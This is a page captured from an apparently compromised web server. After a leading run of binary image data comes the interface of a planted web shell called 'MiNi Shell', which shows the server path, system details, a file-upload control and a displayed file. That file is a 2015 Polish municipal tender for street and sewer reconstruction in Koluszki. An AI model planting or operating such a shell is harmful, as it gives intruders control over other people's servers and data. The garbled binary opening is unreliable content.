JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150217/21413-N-2015.html

<p class="kh_header"><b>Koluszki: Przebudowa odcinka ulicy 11 Listopada w Koluszkach wraz z infrastrukturą techniczną</b><br>
<b>Numer ogłoszenia: 21413 - 2015; data zamieszczenia: 17.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa odcinka ulicy 11 Listopada w Koluszkach wraz z infrastrukturą techniczną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  przebudowa  odcinka  ul.11 Listopada w Koluszkach wraz z infrastrukturą techniczną.
2. W zakres prac do realizacji wchodzi:
1) rozebranie  chodników, obrzeży, krawężników, sfrezowanie istniejącej nawierzchni bitumicznej,  wykonanie robót ziemnych, wywiezienie zdemontowanych  materiałów. 
2) budowa kanalizacji sanitarnej grawitacyjnej o średnicy 200 mm na długości: 1.126,00 m  z  przykanalikami, 
3) wykonanie studzienek żelbetowych DN 1200 mm w ilości 29 sztuk, oraz studzienek kanalizacyjnych  DN 425 mm w ilości 21 sztuk,
4) budowa  kanalizacji  tłocznej  z rur PE o  średnicy  90 mm  na długości:  845,20 m
5) montaż 1 przepompowni  ścieków z doprowadzeniem  zasilana  elektrycznego  i ogrodzeniem  terenu  przepompowni,
6)  przebudowa  sieci wodociągowej PE o średnicy 160 mm o długości  631,80  m  wraz z 8przyłączami wodociągowymi oraz montażem  armatury wodociągowej,
7)  budowa sieci kanalizacji deszczowej z  rur PP o średnicy  zewnętrznej od 160 mm do 500 mm na  długości  ogółem: 1.307,66 mb z montażem 28 studni rewizyjnych betonowych  o  średnicy  DN 1000 mm - DN 1200 mm,  oraz studzienkami  ściekowymi  DN 500 mm z osadnikami  w  ilości  64 sztuk.
8)  wykonanie  podbudowy  oraz  nawierzchni  ścieralnej  z  mieszanek  mineralno -  asfaltowych SMA  na  powierzchni: 8.732  m2, 
9)  wykonanie   podbudowy i nawierzchni  zjazdów z kostki brukowej  na powierzchni : 1.181,00 m 2, zatok parkingowych  i zatoki autobusowej  z kostki brukowej  na powierzchni  1.156,00 m2,  nawierzchni  chodników  z kostki  brukowej  na powierzchni:   3.858,00 m2, 
10) wykonanie  ław  betonowych,  wstawienie  krawężników  betonowych na długości 2.672 m, obrzeży  betonowych na długości 2.283 m,  cieków  przykrawężnikowych,  wykonanie  pobocza  destruktem.
11) regulacja  pionowa  armatury wodociągowo - kanalizacyjnej,  układanie rur  ochronnych,  
ręczne  plantowanie  powierzchni z humusowaniem skarp.
12) wykonanie  projektu  tymczasowej  organizacji ruchu  na czas budowy, uzgodnienie i ustawienie  oznakowania  pionowego  na czas  realizacji  robót.
3. Miejsce  realizacji: odcinek drogi powiatowej nr 2918 E  ul.11 Listopada  w Koluszkach 
tj. od wykonanego  ronda przy ulicy  Kościuszki / Sikorskiego do terenu P.K.P. ( bocznica  kolejowa)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 Ustawy Prawo Zamówień Publicznych. Zamówienia uzupełniające  stanowiące  nie  więcej  niż 50 % zamówienia podstawowego będzie udzielone tylko w przypadku, gdy zajdzie taka konieczność i spełnione  zostaną  przesłanki  art. 67 ust.1 pkt. 6  Ustawy  Prawo Zamówień  Publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.13.00-8, 45.23.14.00-9, 45.23.32.90-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 60.000,00 zł  słownie: sześćdziesiąt tysięcy złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanych oświadczeń  o  spełnieniu  warunków  udziału w postępowaniu, o których mowa w art. 22 ust.1 i  art. 24  Ustawy Prawo Zamówień Publicznych, oraz gdy Wykonawca załączy aktualny odpis z właściwego rejestru lub
z centralnej ewidencji  i informacji o działalności gospodarczej, jeżeli  odrębne  przepisy wymagają  wpisu do rejestru, lub  ewidencji, w celu wykazania braku podstaw do wykluczenia w  oparciu  o art. 24 ust. 1 pkt. 2 Ustawy z dnia 29 stycznia 2004 r.Prawo Zamówień Publicznych,  wystawionego  nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Na podstawie załączonych dokumentów i oświadczeń Zamawiający zweryfikuje, czy Wykonawca  spełnia, czy nie spełnia warunki udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenia o spełnieniu  warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 Ustawy Prawo Zamówień Publicznych, oraz gdy Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności  jest  krótszy w tym okresie,  wykonywał:  
a) minimum  dwie  realizacje polegające na budowie  sieci  kanalizacji  sanitarnej o  długości  nie  mniejszej  niż  1.000 mb ( słownie:  jeden  tysiąc metrów) - każde zadanie,
b) minimum  dwie realizacje polegające na budowie, przebudowie nawierzchni mineralno  - asfaltowych na  powierzchni nie mniejszej niż 6.000 m2  ( słownie: sześć tysięcy metrów kwadratowych)  - każde  zadanie.
Wymagania w zakresie posiadanego  doświadczenia w różnych branżach tj. drogowej i kanalizacji sanitarnej  zawarte w punkcie  2  p.pkt. a, b mogą być zrealizowane przez  Wykonawcę  na jednym zadaniu, lub  na różnych  zadaniach.
Należy  podać  rodzaj robót, wartość oraz datę  i  miejsce wykonania  wraz z załączeniem  dowodów dotyczących najważniejszych  robót określających, czy roboty te zostały wykonane  w sposób należyty  oraz wskazujących, czy zostały wykonane  zgodnie z zasadami sztuki  budowlanej  i prawidłowo ukończone.
Na  podstawie  załączonych  dokumentów i oświadczeń  Zamawiający zweryfikuje, czy  Wykonawca  spełnia, czy nie spełnia warunki udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten warunek za  spełniony na  podstawie  podpisanego oświadczenia o spełnieniu warunków udziału w  postępowaniu  o  których mowa  w  art. 22 ust. 1 Ustawy Prawo Zamówień  Publicznych. 
Na  podstawie załączonych  dokumentów  i oświadczeń Zamawiający zweryfikuje, czy  Wykonawca  spełnia, czy  nie spełnia  warunki  udziału  w  postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek za spełniony na  podstawie podpisanego oświadczenia o spełnieniu  warunków udziału w  postępowaniu, o których mowa  w  art. 22 ust. 1 Ustawy  Prawo Zamówień  Publicznych  oraz, gdy Wykonawca dysponuje lub będzie dysponował  osobami, które będą uczestniczyć  w  wykonaniu  zamówienia, a  w szczególności będą  odpowiedzialne za kierowanie  robotami  budowlanymi  i  osoby te  będą posiadały uprawnienia  budowlane  w  specjalności:
a)  drogowej,
b)  elektrycznej  do 1 kV,
c)  instalacyjnej  w zakresie sieci  i urządzeń: wodociągowo - kanalizacyjnych. 
zgodnie z art.12 a ustawy  z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2010 r. Nr  243  poz.1623 z późniejszymi  zmianami ).
Na podstawie załączonych dokumentów i oświadczeń Zamawiający zweryfikuje, czy Wykonawca spełnia, czy  nie spełnia  warunki  udziału  w  postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenie  o spełnieniu  warunków  udziału  w  postępowaniu, o  których  mowa  w  art. 22 ust. 1 Ustawy Prawo Zamówień  Publicznych.
Na  podstawie  załączonych  dokumentów  i  oświadczeń  Zamawiający zweryfikuje, czy  Wykonawca  spełnia, czy  nie spełnia  warunki  udziału  w  postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony  formularz  oferty ( załącznik nr1 do Specyfikacji  Istotnych  Warunków  Zamówienia),
2. W przypadku,  gdy Wykonawca  będzie  korzystał z wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do  wykonania  zamówienia  innych podmiotów,  zobowiązany  jest przedstawić pisemne  zobowiązanie tych podmiotów  do oddania  mu do  dyspozycji  niezbędnych  zasobów  na  okres korzystania z nich  przy wykonywaniu  zamówienia.
3. W przypadku, gdy podmioty występują wspólnie wykonawcy powinni ustanowić pełnomocnika do reprezentowania ich w  postępowaniu o udzielenie zamówienia, albo  reprezentowania  w postępowaniu  i  zawarcia umowy w sprawie zamówienia  publicznego. 
4.  Szczegółowy  kosztorys ofertowy wykonany na podstawie przedmiaru  robót.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Wydłużenie okresu gwarancji jakości i rękojmi - 4</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących przypadkach:
a) w uzasadnionych  przypadkach,  a w szczególności,  gdy zajdzie: konieczność dokonania  zmian  w  projekcie  budowlanym,przekroczenia terminów  wydawania przez organy administracji : decyzji 
i zezwoleń itp., wystąpienia znalezisk archeologicznych, wyjątkowo niesprzyjających warunków  atmosferycznych, geologicznych, hydrologicznych, nieprzewidzianych kolizji z urządzeniami infrastruktury, w  przypadku działania siły wyższej w rozumieniu przepisów Kodeksu Cywilnego;  lub  
w innych okolicznościach  niezależnych  od  Zamawiającego  lub  Wykonawcy, kiedy  konieczna  będzie  zmiana terminu realizacji zamówienia, Zamawiający na pisemny wniosek Wykonawcy może  przedłużyć  termin realizacji  zamówienia,
b) w innych uzasadnionych  przypadkach, gdy zajdzie konieczność  wprowadzenia  do  umowy koniecznych zmian wynikających z okoliczności, których nie  można  było  przewidzieć  w chwili  zawarcia umowy, Zamawiający za  zgodą  Wykonawcy  może dokonać  takiej  zmiany.
c) w przypadku, gdy zmiany postanowień zawartej umowy będą  korzystne dla Zamawiającego, a  zmiany  te wynikły  w  trakcie  realizacji  zamówienia, Zamawiający  za zgodą  Wykonawcy może dokonać  takiej zmiany.
d) w  przypadku, gdy zajdzie uzasadniona konieczność ograniczenia, lub rezygnacji z  części  umownego  zakresu  robót, Zamawiający zastrzega sobie możliwość zmniejszenia  wynagrodzenia  umownego  poprzez korektę  wartości  ryczałtowej  przedmiotu umowy  po  cenach  i stawkach  wynikających  z kosztorysu ofertowego  Wykonawcy,
e) w przypadku, gdy zajdzie uzasadniona konieczność wykonania  robót zamiennych  mających  służyć  właściwej  realizacji zamówienia, Zamawiający zastrzega sobie możliwość zmiany  umówionego  wynagrodzenia  wynikającego  z  porównania  rozmiaru i wartości  robót zamiennych  z robotami  przewidzianymi do  realizacji  w dokumentacji  projektowej i zawartej umowie z zastrzeżeniem nieprzekraczalności ceny ofertowej, która będzie stanowić  maksymalną graniczną  kwotę umówionego wynagrodzenia. W  przypadku  wystąpienia  robót  dodatkowych  lub  uzupełniających  nieobjętych  niniejszym zamówieniem, niezbędnym  do  prawidłowego wykonania umowy, roboty te zostaną  rozliczone zostaną w oparciu  o ceny  i wskaźniki  cenotwórcze zaproponowane  przez wykonawcę  w kosztorysie szczegółowym. Zlecenie  wykonania  robót  dodatkowych lub uzupełniających dokonane  zostanie w  oparciu  o odrębną umowę.  
f) w przypadku ustawowej  zmiany  stawki  podatku od  towarów i  usług  ( VAT) cena  netto pozostanie bez zmian, a kwota podatku VAT i  wartość  brutto zostanie  odpowiednio  skorygowana  zgodnie z aktualnie  obowiązującymi  przepisami  podatkowymi.
2) W  razie zaistnienia  zmiany  okoliczności  powodującej, że wykonanie  umowy nie  leży 
w interesie  publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,Zamawiający może odstąpić od umowy w terminie 30 dni od dnia  powzięcia wiadomości  o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Koluszkach przy ul. 11 Listopada 65 pok. nr 203.
Koszt S.I.W.Z. w wersji papierowej -200 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2015 godzina 09:30, miejsce: Urząd Miejski w  Koluszkach przy ul 11 Listopada 65   Sekretariat  JRP pok nr 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Budowa kanalizacji sanitarnej realizowana jest w ramach Projektu  pn. Uporządkowanie gospodarki wodno -ściekowej na terenie aglomeracji Koluszki współfinansowanego przez Unię Europejską ze środków Funduszy Spójności  w ramach Programu Operacyjnego Infrastruktura i Środowisko..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com